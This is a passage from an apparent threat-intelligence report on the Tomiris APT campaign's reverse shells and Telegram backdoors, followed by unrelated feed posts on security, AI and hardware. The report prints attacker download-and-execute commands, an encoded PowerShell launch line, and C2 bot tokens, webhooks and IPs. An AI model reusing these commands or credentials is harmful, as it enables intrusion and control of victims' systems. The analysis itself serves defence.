cmd.exe /c "curl -O $public\sysmgmt.exe http://<HOST>/private/svchost.exe"
cmd.exe /c "$public\sysmgmt.exe"
Tomiris Python Telegram ReverseShell
The Trojan is written in Python and compiled into an executable using PyInstaller. The main script is also obfuscated with PyArmor. We managed to remove the obfuscation and recover the original script code. The Trojan uses Telegram to communicate with the C2 server, with code containing an authentication token and a “chat_id” to connect to the bot and receive commands for execution. Functionally, it is a reverse shell, capable of receiving text commands from the C2, executing them on the infected system, and sending the execution results back to the C2.
Initially, we assumed this was an updated version of the Telemiris bot previously used by the group. However, after comparing the original scripts of both Trojans, we concluded that they are distinct malicious tools.
Python Telegram ReverseShell (to the right) and Telemiris (to the left)
Other implants used as first-stage infectors
Below, we list several implants that were also distributed in phishing archives. Unfortunately, we were unable to track further actions involving these implants, so we can only provide their descriptions.
Tomiris C# Telegram ReverseShell
Another reverse shell that uses Telegram to receive commands. This time, it is written in C# and operates using the following credentials:
URL = hxxps://api.telegram[.]org/bot7804558453:AAFR2OjF7ktvyfygleIneu_8WDaaSkduV7k/
CHAT_ID = 7709228285
Tomiris C# Telegram ReverseShell
JLORAT
One of the oldest implants used by malicious actors has undergone virtually no changes since it was first identified in 2022. It is capable of taking screenshots, executing console commands, and uploading files from the infected system to the C2. The current version of the Trojan lacks only the download command.
Tomiris Rust ReverseShell
This Trojan is a simple reverse shell written in the Rust programming language. Unlike other reverse shells used by attackers, it uses PowerShell as the shell rather than cmd.exe.
Strings used by main routine of Tomiris Rust ReverseShell
Tomiris Go ReverseShell
The Trojan is a simple reverse shell written in Go. We were able to restore the source code. It establishes a TCP connection to 62.113.114.209 on port 443, runs cmd.exe and redirects standard command line input and output to the established connection.
Restored code of Tomiris Go ReverseShell
Tomiris PowerShell Telegram Backdoor
The original executable is a simple packer written in C++. It extracts a Base64-encoded PowerShell script from itself and executes it using the following command line:
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JABjAGgAYQB0AF8AaQBkACAAPQAgACIANwA3ADAAOQAyADIAOAAyADgANQ…………
The extracted script is a backdoor written in PowerShell that uses Telegram to communicate with the C2 server. It has only two key commands:
/upload: Download a file from Telegram using afile_Ididentifier provided as a parameter and save it to “C:\Users\Public\Libraries\” with the name specified in the parameterfile_name./go: Execute a provided command in the console and return the results as a Telegram message.
The script uses the following credentials for communication:
$chat_id = "7709228285"
$botToken = "8039791391:AAHcE2qYmeRZ5P29G6mFAylVJl8qH_ZVBh8"
$apiUrl = "hxxps://api.telegram[.]org/bot$botToken/"
Strings used by main routine of Tomiris PowerShell Telegram Backdoor
Tomiris C# ReverseShell
A simple reverse shell written in C#. It doesn’t support any additional commands beyond console commands.
Tomiris C# ReverseShell main routine
Other implants
During the investigation, we also discovered several reverse SOCKS proxy implants on the servers from which subsequent implants were downloaded. These samples were also found on infected systems. Unfortunately, we were unable to determine which implant was specifically used to download them. We believe these implants are likely used to proxy traffic from vulnerability scanners and enable lateral movement within the network.
Tomiris C++ ReverseSocks (based on GitHub Neosama/Reverse-SOCKS5)
The implant is a reverse SOCKS proxy written in C++, with code that is almost entirely copied from the GitHub project Neosama/Reverse-SOCKS5. Debugging messages from the original project have been removed, and functionality to hide the console window has been added.
Main routine of Tomiris C++ ReverseSocks
Tomiris Go ReverseSocks (based on GitHub Acebond/ReverseSocks5)
The Trojan is a reverse SOCKS proxy written in Golang, with code that is almost entirely copied from the GitHub project Acebond/ReverseSocks5. Debugging messages from the original project have been removed, and functionality to hide the console window has been added.
Difference between the restored main function of the Trojan code and the original code from the GitHub project
Victims
Over 50% of the spear-phishing emails and decoy files in this campaign used Russian names and contained Russian text, suggesting a primary focus on Russian-speaking users or entities. The remaining emails were tailored to users in Turkmenistan, Kyrgyzstan, Tajikistan, and Uzbekistan, and included content in their respective national languages.
Attribution
In our previous report, we described the JLORAT tool used by the Tomiris APT group. By analyzing numerous JLORAT samples, we were able to identify several distinct propagation patterns commonly employed by the attackers. These patterns include the use of long and highly specific filenames, as well as the distribution of these tools in password-protected archives with passwords in the format “xyz@2025” (for example, “min@2025” or “sib@2025”). These same patterns were also observed with reverse shells and other tools described in this article. Moreover, different malware samples were often distributed under the same file name, indicating their connection. Below is a brief list of overlaps among tools with similar file names:
| Filename (for convenience, we used the asterisk character to substitute numerous space symbols before file extension) | Tool |
| аппарат правительства российской федерации по вопросу отнесения реализуемых на территории сибирского федерального округа*.exe (translated: Federal Government Agency of the Russian Federation regarding the issue of designating objects located in the Siberian Federal District*.exe) | Tomiris C/C++ ReverseShell: 078be0065d0277935cdcf7e3e9db4679 33ed1534bbc8bd51e7e2cf01cadc9646 536a48917f823595b990f5b14b46e676 9ea699b9854dde15babf260bed30efcc Tomiris Rust ReverseShell: 9a9b1ba210ac2ebfe190d1c63ec707fa Tomiris Go ReverseShell: Tomiris PowerShell Telegram Backdoor: |
| О работе почтового сервера план и проведенная работа*.exe (translated: Work of the mail server: plan and performed work*.exe) | Tomiris C/C++ ReverseShell: 0f955d7844e146f2bd756c9ca8711263 Tomiris Rust Downloader: 1083b668459beacbc097b3d4a103623f Tomiris C# ReverseShell: Tomiris Go ReverseShell: |
| план-протокол встречи о сотрудничестве представителей*.exe (translated: Meeting plan-protocol on cooperation representatives*.exe) | Tomiris PowerShell Telegram Backdoor: 09913c3292e525af34b3a29e70779ad6 0ddc7f3cfc1fb3cea860dc495a745d16 Tomiris C/C++ ReverseShell: 0f955d7844e146f2bd756c9ca8711263 Tomiris Rust Downloader: JLORAT: |
| положения о центрах передового опыта (превосходства) в рамках межгосударственной программы*.exe (translated: Provisions on Centers of Best Practices (Excellence) within the framework of the interstate program*.exe) | Tomiris PowerShell Telegram Backdoor: 09913c3292e525af34b3a29e70779ad6 Tomiris C/C++ ReverseShell: 33ed1534bbc8bd51e7e2cf01cadc9646 9ea699b9854dde15babf260bed30efcc JLORAT: Tomiris Rust Downloader: |
We also analyzed the group’s activities and found other tools associated with them that may have been stored on the same servers or used the same servers as a C2 infrastructure. We are highly confident that these tools all belong to the Tomiris group.
Conclusions
The Tomiris 2025 campaign leverages multi-language malware modules to enhance operational flexibility and evade detection by appearing less suspicious. The primary objective is to establish remote access to target systems and use them as a foothold to deploy additional tools, including AdaptixC2 and Havoc, for further exploitation and persistence.
The evolution in tactics underscores the threat actor’s focus on stealth, long-term persistence, and the strategic targeting of government and intergovernmental organizations. The use of public services for C2 communications and multi-language implants highlights the need for advanced detection strategies, such as behavioral analysis and network traffic inspection, to effectively identify and mitigate such threats.
Indicators of compromise
More indicators of compromise, as well as any updates to them, are available to customers of our APT reporting service. If interested, please contact intelreports@kaspersky.com.
Distopia Backdoor
B8FE3A0AD6B64F370DB2EA1E743C84BB
Tomiris Python Discord ReverseShell
091FBACD889FA390DC76BB24C2013B59
Tomiris Python FileGrabber
C0F81B33A80E5E4E96E503DBC401CBEE
Tomiris Python Telegram ReverseShell
42E165AB4C3495FADE8220F4E6F5F696
Tomiris C# Telegram ReverseShell
2FBA6F91ADA8D05199AD94AFFD5E5A18
Tomiris C/C++ ReverseShell
0F955D7844E146F2BD756C9CA8711263
078BE0065D0277935CDCF7E3E9DB4679
33ED1534BBC8BD51E7E2CF01CADC9646
Tomiris Rust Downloader
1083B668459BEACBC097B3D4A103623F
JLORAT
C73C545C32E5D1F72B74AB0087AE1720
Tomiris Rust ReverseShell
9A9B1BA210AC2EBFE190D1C63EC707FA
Tomiris C++ ReverseSocks (based on GitHub Neosama/Reverse-SOCKS5)
2ED5EBC15B377C5A03F75E07DC5F1E08
Tomiris PowerShell Telegram Backdoor
C75665E77FFB3692C2400C3C8DD8276B
Tomiris C# ReverseShell
DF95695A3A93895C1E87A76B4A8A9812
Tomiris Go ReverseShell
087743415E1F6CC961E9D2BB6DFD6D51
Tomiris Go ReverseSocks (based on GitHub Acebond/ReverseSocks5)
83267C4E942C7B86154ACD3C58EAF26C
AdaptixC2
CD46316AEBC41E36790686F1EC1C39F0
1241455DA8AADC1D828F89476F7183B7
F1DCA0C280E86C39873D8B6AF40F7588
Havoc
4EDC02724A72AFC3CF78710542DB1E6E
Domains/IPs/URLs
Distopia Backdoor
hxxps://discord[.]com/api/webhooks/1357597727164338349/ikaFqukFoCcbdfQIYXE91j-dGB-8YsTNeSrXnAclYx39Hjf2cIPQalTlAxP9-2791UCZ
Tomiris Python Discord ReverseShell
hxxps://discord[.]com/api/webhooks/1370623818858762291/p1DC3l8XyGviRFAR50de6tKYP0CCr1hTAes9B9ljbd-J-dY7bddi31BCV90niZ3bxIMu
hxxps://discord[.]com/api/webhooks/1388018607283376231/YYJe-lnt4HyvasKlhoOJECh9yjOtbllL_nalKBMUKUB3xsk7Mj74cU5IfBDYBYX-E78G
hxxps://discord[.]com/api/webhooks/1386588127791157298/FSOtFTIJaNRT01RVXk5fFsU_sjp_8E0k2QK3t5BUcAcMFR_SHMOEYyLhFUvkY3ndk8-w
hxxps://discord[.]com/api/webhooks/1369277038321467503/KqfsoVzebWNNGqFXePMxqi0pta2445WZxYNsY9EsYv1u_iyXAfYL3GGG76bCKy3-a75
hxxps://discord[.]com/api/webhooks/1396726652565848135/OFds8Do2qH-C_V0ckaF1AJJAqQJuKq-YZVrO1t7cWuvAp7LNfqI7piZlyCcS1qvwpXTZ
Tomiris Python FileGrabber
hxxp://62.113.115[.]89/homepage/infile.php
Tomiris Python Telegram ReverseShell
hxxps://api.telegram[.]org/bot7562800307:AAHVB7Ctr-K52J-egBlEdVoRHvJcYr-0nLQ/
Tomiris C# Telegram ReverseShell
hxxps://api.telegram[.]org/bot7804558453:AAFR2OjF7ktvyfygleIneu_8WDaaSkduV7k/
Tomiris C/C++ ReverseShell
77.232.39[.]47
109.172.85[.]63
109.172.85[.]95
185.173.37[.]67
185.231.155[.]111
195.2.81[.]99
Tomiris Rust Downloader
hxxps://discordapp[.]com/api/webhooks/1392383639450423359/TmFw-WY-u3D3HihXqVOOinL73OKqXvi69IBNh_rr15STd3FtffSP2BjAH59ZviWKWJRX
hxxps://discordapp[.]com/api/webhooks/1363764458815623370/IMErckdJLreUbvxcUA8c8SCfhmnsnivtwYSf7nDJF-bWZcFcSE2VhXdlSgVbheSzhGYE
hxxps://discordapp[.]com/api/webhooks/1355019191127904457/xCYi5fx_Y2-ddUE0CdHfiKmgrAC-Cp9oi-Qo3aFG318P5i-GNRfMZiNFOxFrQkZJNJsR
hxxp://82.115.223[.]218/
hxxp://172.86.75[.]102/
hxxp://193.149.129[.]113/
JLORAT
hxxp://82.115.223[.]210:9942/bot_auth
hxxp://88.214.26[.]37:9942/bot_auth
hxxp://141.98.82[.]198:9942/bot_auth
Tomiris Rust ReverseShell
185.209.30[.]41
Tomiris C++ ReverseSocks (based on GitHub “Neosama/Reverse-SOCKS5”)
185.231.154[.]84
Tomiris PowerShell Telegram Backdoor
hxxps://api.telegram[.]org/bot8044543455:AAG3Pt4fvf6tJj4Umz2TzJTtTZD7ZUArT8E/
hxxps://api.telegram[.]org/bot7864956192:AAEjExTWgNAMEmGBI2EsSs46AhO7Bw8STcY/
hxxps://api.telegram[.]org/bot8039791391:AAHcE2qYmeRZ5P29G6mFAylVJl8qH_ZVBh8/
hxxps://api.telegram[.]org/bot7157076145:AAG79qKudRCPu28blyitJZptX_4z_LlxOS0/
hxxps://api.telegram[.]org/bot7649829843:AAH_ogPjAfuv-oQ5_Y-s8YmlWR73Gbid5h0/
Tomiris C# ReverseShell
206.188.196[.]191
188.127.225[.]191
188.127.251[.]146
94.198.52[.]200
188.127.227[.]226
185.244.180[.]169
91.219.148[.]93
Tomiris Go ReverseShell
62.113.114[.]209
195.2.78[.]133
Tomiris Go ReverseSocks (based on GitHub “Acebond/ReverseSocks5”)
192.165.32[.]78
188.127.231[.]136
AdaptixC2
77.232.42[.]107
94.198.52[.]210
96.9.124[.]207
192.153.57[.]189
64.7.199[.]193
Havoc
78.128.112[.]209
Malicious URLs
hxxp://188.127.251[.]146:8080/sbchost.rar
hxxp://188.127.251[.]146:8080/sxbchost.exe
hxxp://192.153.57[.]9/private/svchost.exe
hxxp://193.149.129[.]113/732.exe
hxxp://193.149.129[.]113/system.exe
hxxp://195.2.79[.]245/732.exe
hxxp://195.2.79[.]245/code.exe
hxxp://195.2.79[.]245/firefox.exe
hxxp://195.2.79[.]245/rever.exe
hxxp://195.2.79[.]245/service.exe
hxxp://195.2.79[.]245/winload.exe
hxxp://195.2.79[.]245/winload.rar
hxxp://195.2.79[.]245/winsrv.rar
hxxp://195.2.79[.]245/winupdate.exe
hxxp://62.113.115[.]89/offel.exe
hxxp://82.115.223[.]78/private/dwm.exe
hxxp://82.115.223[.]78/private/msview.exe
hxxp://82.115.223[.]78/private/spoolsvc.exe
hxxp://82.115.223[.]78/private/svchost.exe
hxxp://82.115.223[.]78/private/sysmgmt.exe
hxxp://85.209.128[.]171:8000/AkelPad.rar
hxxp://88.214.25[.]249:443/netexit.rar
hxxp://89.110.95[.]151/dwm.exe
hxxp://89.110.98[.]234/Rar.exe
hxxp://89.110.98[.]234/code.exe
hxxp://89.110.98[.]234/rever.rar
hxxp://89.110.98[.]234/winload.exe
hxxp://89.110.98[.]234/winload.rar
hxxp://89.110.98[.]234/winrm.exe
hxxps://docsino[.]ru/wp-content/private/alone.exe
hxxps://docsino[.]ru/wp-content/private/winupdate.exe
hxxps://sss.qwadx[.]com/12345.exe
hxxps://sss.qwadx[.]com/AkelPad.exe
hxxps://sss.qwadx[.]com/netexit.rar
hxxps://sss.qwadx[.]com/winload.exe
hxxps://sss.qwadx[.]com/winsrv.exe
cyrboost reshared this.
La sicurezza informatica è noiosa! La chiave? E’ spesso eliminare il superfluo
Ogni giorno salta fuori un nuovo bug su firewall, VPN e altri sistemi messi lì a difendere il perimetro. È quasi un rituale stanco: qualcuno scopre un’altra falla, un’altra crepa che non dovrebbe esserci, e ci si ritrova a pensare che forse questa idea del “perimetro blindato” era già un po’ traballante in partenza.
La cosa buffa-buffa, è quella che alle volte il problema vero non è il firewall in sé a essere messo male, ma la sua web application di amministrazione. Quella che dovrebbe stare chiusa, sigillata, protetta come un vecchio album di foto di famiglia. Invece viene esposta sempre lì, su Internet, in scioltezza da pilates.
E quindi basta cercare su Shodan, Censys o Zoomeye. Due parole, un clic distratto, e spuntano fuori migliaia di questi apparati lasciati allo scoperto. Un panorama quasi deprimente e allo stesso tempo “inquietante” se non fosse che a volte fa pure sorridere per quanto è puerile e paradossalmente “nati sicuro”.
Chiavi sotto il tappetino
Davvero, sembra che molti non abbiano capito la cosa più semplice: le chiavi di casa si tengono nel portachiavi, non sotto il tappetino. Eppure, con firewall e VPN molti ancora fanno esattamente il contrario. È quasi un gesto rituale che non fa comprendere se se di sicurezza le persone non ne sanno davvero nulla oppure “dai, lasciamo questo pannello qui, ci facilita la vita … tanto cosa vuoi che succeda mai?”.
Su Red Hot Cyber questa storia la si ripete da anni. Roba detta, ridetta, urlata in maiuscolo e in corsivo mentale fin dagli esordi della nostra community. Bisogna RIDURRE LA SUPERFICE DI RISCHIO CYBER – diceva il nostro fondatore Massimiliano Brolli nel 2017 – ridurla in ogni modo possibile, farla a fette finché non resta solo quello che serve davvero.
E la primissima cosa da fare, così banale che quasi imbarazza scriverla: occorre eliminare ciò che non serve essere esposto. Eliminarlo proprio: via, fuori! Sparito da Internet.
Ogni servizio lasciato aperto aggiunge un punto debole. Ogni pannello d’amministrazione messo lì alla luce del sole diventa un potenziale invito per chi vuole sfruttarlo. E non parlo di attacchi geniali: spesso è roba da manuale del principiante, da script kiddie, non da organizzazione statuale munita di potenti zeroday.
E sì … qualcuno potrebbe dire che è noioso. E’ vero e ci sta. Ma la sicurezza è “militare”, “organizzata”, ed è spesso noiosa. Ma è proprio per questo funziona bene se la conosci e la sai implementare.
Eliminare è un atto di cura
Non serve fare patch eroiche se un servizio non dovrebbe stare lì in primo luogo.
Eliminare è più rapido, pulito, quasi terapeutico… direi “chirurgico”. Eppure molti preferiscono trascinarsi dietro applicazioni vecchie, pannelli obsoleti, sistemi dimenticati ma ancora aperti. Una sorta di “collezionismo del pericolo”.
È come lasciare la porta di casa spalancata perché la serratura cigola. Per comodità, dicono. Per fretta. Ma la fretta, si sa, fa danni peggiori di qualsiasi hacker. Gli attaccanti queste cose le adorano. Non devono fare nulla: basta guardare, raccogliere ciò che trovano per terra, come un portafoglio lasciato sulla panchina.
La banalità è quindi il vero mostro
Spesso è solo “configurazione”, “vulnerabilità banali”, ma proprio ma proprio banali. Credenziali lasciate come mamma le ha fatte (di default), pagine di login che chiunque può raggiungere. Eppure il problema continua a riapparire come una macchia che non se ne va mai.
E mentre tutti parlano degli attacchi sofisticati, nei fatti il primo varco lo apre quasi sempre chi dovrebbe averlo chiuso.
È un paradosso che ormai non sorprende più nessuno, ma fa sempre molto male.
La banalità, quando si parla di sicurezza, è quasi un animale selvatico: silenzioso, fastidioso e capace di mordere forte… quando meno te ne accorgi. E fa poi male, tanto ma tanto male.
L'articolo La sicurezza informatica è noiosa! La chiave? E’ spesso eliminare il superfluo proviene da Red Hot Cyber.
Digital Riots: Wie wir alle die verpflichtende Chatkontrolle gestoppt haben
netzpolitik.org/2025/digital-r…
Any Old TV Can Be A Clock With Arduino
If you’ve got an old black and white TV, it’s probably not useful for much. There are precious few analog broadcasters left in the world and black and white isn’t that fun to watch, anyway. However, with a little work, you could repurpose that old tube as a clock, as [mircemk] demonstrates.
The build is based around an Arduino Nano R3. This isn’t a particularly powerful microcontroller board, but it’s good enough to run the classic TVOut library. This library lets you generate composite video on an Atmel AVR microcontroller with an absolute minimum of supporting circuitry. [mircemk] paired the Arduino with a DS3231 real-time clock, and whipped up code to display the time and date on the composite video output. He then also demonstrates how to hack the signal into an old TV that doesn’t have a specific input for composite signals.
You’ll note the headline says “any old TV can be a clock,” and that’s for good reason. Newer TVs tend to eschew the classic composite video input, so the TVOut library won’t be any good if you’re trying to get a display up on your modern-era flatscreen. In any case, we’ve seen the TVOut library put to good use before, too. Video after the break.
youtube.com/embed/JuSsQqInKgo?…
La Cina supera gli Stati Uniti nei modelli di intelligenza artificiale open source
La Cina supera gli Stati Uniti nel mercato globale dei modelli di intelligenza artificiale (IA) open source. Secondo un rapporto del Financial Times del 26 novembre, uno studio del MIT e della startup di IA open source Hugging Face ha rilevato che nell’ultimo anno la quota di download di modelli di IA open source sviluppati da team cinesi è salita al 17%, superando per la prima volta le controparti americane e ottenendo un vantaggio fondamentale nell’applicazione globale della tecnologia IA.
Nel contesto del boom dell’intelligenza artificiale che sta travolgendo l’industria tecnologica globale, i giganti tecnologici statunitensi come OpenAI, Google e Anthropic tendono ad adottare una strategia “chiusa“, mantenendo il controllo completo sulle tecnologie di intelligenza artificiale avanzate e traendo profitto dagli abbonamenti degli utenti e dalle partnership aziendali.
Al contrario, le aziende tecnologiche cinesi privilegiano una strategia più aperta, rilasciando una serie di modelli open source.
I modelli di intelligenza artificiale open source si riferiscono a modelli di intelligenza artificiale il cui codice e architettura sono pubblicamente disponibili, consentendo a qualsiasi sviluppatore di scaricarli, utilizzarli, modificarli e distribuirli. L’adozione diffusa di modelli open source avrà un impatto significativo sullo sviluppo futuro dell’intelligenza artificiale, facilitando lo sviluppo di prodotti da parte delle startup e il miglioramento dei ricercatori.
Grazie all’impegno instancabile dei ricercatori cinesi, i modelli open source cinesi hanno dimostrato una forte competitività. Una ricerca del MIT e di Hugging Face ha rilevato che nell’ultimo anno la percentuale di nuovi modelli di intelligenza artificiale open source sul totale dei download di modelli open source è salita al 17%, superando il 15,8% dei team di sviluppo negli Stati Uniti. Questa è la prima volta che i team cinesi hanno superato le loro controparti americane in questo parametro.
Wendy Chang, analista senior del Mercator Institute for China Studies, un think tank tedesco, sottolinea: “L’open source è una tendenza più diffusa in Cina che negli Stati Uniti. Le aziende americane non sono disposte a farlo; vogliono fare soldi e non vogliono rivelare i loro segreti commerciali”.
Secondo i dati del MIT e di Hugging Face, DeepSeek e Qwen di Alibaba Cloud sono i modelli open source più scaricati dalla Cina. Il Financial Times ha riportato che il modello DeepSeek-R1 ha scioccato la Silicon Valley: utilizza costi e potenza di calcolo bassi, ma le sue prestazioni sono paragonabili ai migliori modelli statunitensi, sollevando dubbi sulla capacità dei laboratori di intelligenza artificiale statunitensi di mantenere il loro vantaggio competitivo.
Esperti del settore hanno dichiarato al Financial Times che, nonostante la serie di misure adottate dagli Stati Uniti per reprimere la Cina, come i controlli sulle esportazioni di chip, la Cina ha un gran numero di talenti eccezionali che hanno dimostrato grande creatività nello sviluppo di modelli open source.
Nel tentativo di vincere la cosiddetta “corsa all’intelligenza artificiale”, l’amministrazione Trump stava cercando di convincere le aziende americane a investire in modelli open source che incarnassero i “valori americani”. Tuttavia, il numero di grandi team di sviluppo indipendenti per modelli open source negli Stati Uniti è molto inferiore rispetto alla Cina, e giganti della tecnologia statunitensi come Meta stanno ora scegliendo di aumentare i loro investimenti in modelli closed source.
Ad agosto di quest’anno, OpenAI ha rilasciato il suo primo lotto di modelli “open weights”. Questi modelli sono gratuiti, ma le informazioni che forniscono non sono complete come quelle dei modelli open source e non includono il codice e i dati di training necessari per addestrare un modello da zero.
L'articolo La Cina supera gli Stati Uniti nei modelli di intelligenza artificiale open source proviene da Red Hot Cyber.
GAZA: “il genocidio continua”. Striscia inabitabile, i morti sono centomila
@Notizie dall'Italia e dal mondo
Per Amnesty International a Gaza "il genocidio continua", mentre un'agenzia dell'ONU certifica la distruzione totale dell'economia e delle infrastrutture della Striscia e uno studio eleva ad almeno centomila le vittime degli attacchi israeliani
L'articolo GAZA: “il
Notizie dall'Italia e dal mondo reshared this.
US Patent Changes Promise Severe Consequences
When someone creates a US patent, they go through a review process to stop the most blatant copies from previous patents or pre-existing work. After this, you may still have bad patents get through, which can be removed through litigation or publicly accessible methods such as Inter Partes Review (IPR). The latter of which is planned to be changed as we know it in the near future.
IPR is a method where an individual can claim that an existing patent is invalid due to pre-existing work, such as something the individual should have creative ownership over. While there is always the litigation method of removing blatantly fraudulent patents, a small business or the average person is unlikely to have the funds.
New regulations are changing how IPRs can be filed in some substantial ways. Now, if someone files an IPR, they give up the right to future litigation on their rights over a patent. This is obviously not ideal for someone who may have their own products on the line if an IPR is to fail. Additionally, IPRs will no longer be able to be even tried if there are existing cases against the patent, even under poor previous cases. While this change is meant to increase the efficiency of the patent office, there are some serious consequences that must be looked into either way. The patent office also cites IPRs being beneficial to larger organizations rather than the smaller businesses, though you can make your own conclusions based on the U.S. Patent and Trademark Office’s arguments here.
Hackaday certainly can not give any legal advice on how this change will affect you, but there are cases given by both sides that may persuade you to write to your legal representatives if you live in the States. Even still, we here at Hackaday have seen our fair share of patent trolls causing issues. If you want a case of blatant patent shenanigans check out these 3D printing layers that promise improved strength!
Thanks [patentTrollsAreTheWorst] for the tip!
Designing PLA to Hold Over a Metric Ton
There’s never been such a thing as being “too competitive” when it comes to competition. This is something that [Tom Stanton] from Tim Stanton (wait, what now), [Tom]’s 2nd channel, took to heart for Polymaker’s 3D design challenge. The goal was simple: a single 3D printed part to hold as much weight as possible.
While seemingly simple, when considering the requirements, including a single print in addition to being able to open up for the mounts, the challenge gets exponentially more complicated. While the simplest and strongest joint would be a simple oval for uniform stress, this isn’t possible when considering the opening requirements. This creates a need for slightly more creativity.
[Tom] starts out with two flat C-shaped geometries to test his design. The design includes teeth specially placed to allow the forces to increase their own strength as force is applied. Flat features have the unfortunate quality of being able to slide across each other rather easily, which was the case during testing; however, the actual structures held up rather well. Moving onto the final design, including a hollow cavity and a much thicker depth, showed good promise early on in the competition, leading up to the finals. In fact, the design won out over anything else, getting over double the max strength of the runner up. Over an entire metric ton, the piece of plastic proved its abilities far past anything us here at Hackaday would expect from a small piece of PLA.
Design can be an absolute rabbit hole when it comes to even the simplest of things, as shown with this competition. [Tom] clearly showed some personal passion for this project; however, if you haven’t had the chance to dive this deep into CADing, keep sure to try out something like TinkerCAD to get your feet wet. TinkerCAD started out simple as can be but has exploded into quite the formidable suite!
youtube.com/embed/GEHNijssAKc?…
La nuova guerra europea alla privacy: ChatControl violerà i diritti fondamentali
In teoria, Chat Control avrebbe dovuto essere sepolto il mese scorso. Il minaccioso piano dell'UE di scansionare in massa i messaggi privati dei cittadini ha incontrato una schiacciante resistenza pubblica in Germania, con il governo del paese che si è rifiutato di approvarlo. Ma Bruxelles raramente si tira indietro solo perché i cittadini lo chiedono. E così, fedele alla sua forma, una versione rielaborata del testo è già in fase di elaborazione, questa volta nascosta, a porte chiuse.
like this
reshared this
Slava Ukraini!
@Politica interna, europea e internazionale
Lunedì 1 dicembre 2025, ore 11:00 La Fondazione Luigi Einaudi sarà in collegamento direttamente dal Donbas con Giorgio Provinciali, corrispondente di guerra de La Ragione
L'articolo Slava Ukraini! proviene da Fondazione Luigi Einaudi.
Politica interna, europea e internazionale reshared this.
Ministero dell'Istruzione
Il Ministro Giuseppe Valditara è intervenuto oggi a #Bruxelles al Consiglio dei Ministri dell’Istruzione dell’UE sul ruolo della istruzione tecnica e professionale nel garantire validi sbocchi lavorativi ai giovani, contribuendo a rafforzare la compe…Telegram
Hydrofoil Bikes Are Harder To Build Than You Think
Hydrofoils are perhaps best known for their application on boring ferries and scary boats that go too fast. However, as [RCLifeOn] demonstrates, you can also use them to build fun and quirky personal watercraft. Like a hydrofoil bike! Only, there are some challenges involved.
Hydrofoils work much like airfoils in air. The shape of the foil creates lift, raising the attached vehicle out of the water. This allows the creation of a craft that can travel more quickly because the majority of its body is not subject drag from the water. The key is to design the craft such that the hydrofoils remain at the right angle and depth to keep the craft lifted out of the water while remaining stable.
The hydrofoil bike is created out of a combination of plywood, foam, and 3D printed components. It uses a powerful brushless motor for propulsion, and that’s about it. Sadly, despite the simplicity, it wasn’t an instant success. As you might expect, balancing on the bike is quite difficult, particularly when trying to get it started—as the foils need some speed to actually start generating meaningful lift.
After further research into commercial hydrofoil bikes, [RCLifeOn] realized that the buoyancy of the bike made it too hard to straddle when starting out. Some of the 3D printed foils also proved more than a little fragile. It’s back to the drawing board for now—the power system is likely up to snuff, but the dynamics of the platform need work. It’s perhaps no surprise; we’ve covered the challenges of hydrofoil stability before. If you want to go fast on water, you could go the easier route and just build an electric surfboard. Video after the break.
youtube.com/embed/zP1nS3sIu2U?…
Proteste gegen AfD-Jugend: Stadt Gießen will Demoverbotszone vor Gericht durchsetzen
netzpolitik.org/2025/proteste-…
Radical Lab 2025 – Disobbedienza: istruzioni per l’uso
Bologna
28–30 novembre 2025
Dal 28 al 30 novembre si tiene Radical Lab 2025, il laboratorio di Radicali Italiani, intitolato “Disobbedienza: istruzioni per l’uso”
Venerdì 28 novembre Mirella Parachini, ginecologa, vicepresidente dell’Associazione Luca Coscioni, offrirà la sua testimonianza su aborto, obiezione di coscienza e accesso ai diritti riproduttivi alla sessione “Disobbedire in sanità”, mentre sabato 29 novembre Marco Perduca, già senatore e responsabile delle attività internazionali dell’ Associazione Luca Coscioni interverrà nel panel “I Radicali nelle istituzioni europee e italiane”, con una riflessione sul contributo delle battaglie radicali a livello nazionale ed internazionale.
L’evento è chiuso al pubblico
L'articolo Radical Lab 2025 – Disobbedienza: istruzioni per l’uso proviene da Associazione Luca Coscioni.
Ministero dell'Istruzione
È stato approvato ieri in via definitiva alla Camera dei deputati il disegno di legge “Semplificazioni economiche”, che introduce importanti novità anche nel settore dell’#Istruzione, con l’obiettivo di semplificare e rafforzare la comunicazione tra …Telegram
One-Way Data Extraction For Logging On Airgapped Systems
If you want to protect a system from being hacked, a great way to do that is with an airgap. This term specifically refers to keeping a system off any sort of network or external connection — there is literally air in between it and other systems. Of course, this can be limiting if you want to monitor or export logs from such systems. [Nelop Systems] decided to whip up a simple workaround for this issue, creating a bespoke one-way data extraction method.
The concept is demonstrated with a pair of Raspberry Pi computers. One is hooked up to critical industrial control systems, and is airgapped to protect it against outside intruders. It’s fitted with an optocoupler, with a UART hooked up to the LED side of the device. The other side of the optocoupler is hooked up to another Raspberry Pi, which is itself on a network and handles monitoring and logging duties.
This method creates a reliable one-way transmission method from the airgapped machine to the outside world, without allowing data to flow in the other direction. Indeed, there is no direct electrical connection at all, since the data is passing through the optocoupler, which provides isolation between the two computers. Security aficionados will argue that the machine is no longer really airgapped because there is some connection between it and the outside world. Regardless, it would be hard to gain any sort of access through the one-way optocoupler connection. If you can conceive of a way that would work, drop it down in the comments.
Optocouplers are very useful things; we’ve seen them used and abused for all sorts of different applications. If you’ve found some nifty use for these simple parts, be sure to drop us a line!